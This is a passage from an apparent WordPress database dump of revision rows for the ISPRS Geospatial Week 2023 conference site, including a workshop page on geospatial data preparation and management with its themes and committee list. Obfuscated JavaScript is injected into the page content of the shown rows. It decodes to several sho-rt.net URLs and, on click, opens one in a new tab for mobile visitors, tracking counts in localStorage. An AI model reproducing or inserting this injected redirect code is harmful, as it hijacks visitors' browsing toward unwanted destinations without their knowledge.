)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-08 19:53:16','2022-11-08 19:53:16','',2876,'https://gsw2023.com/?p=3061',0,'revision','',0),
(3062,1,'2022-11-08 21:03:59','2022-11-08 21:03:59','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n<li>Alex Bruskin, Senticore Technologies LLC, USA<u></u><u></u>\n<p>&nbsp;</li>\n</ul>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-08 21:03:59','2022-11-08 21:03:59','',2993,'https://gsw2023.com/?p=3062',0,'revision','',0),
(3063,1,'2022-11-08 21:13:29','2022-11-08 21:13:29','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS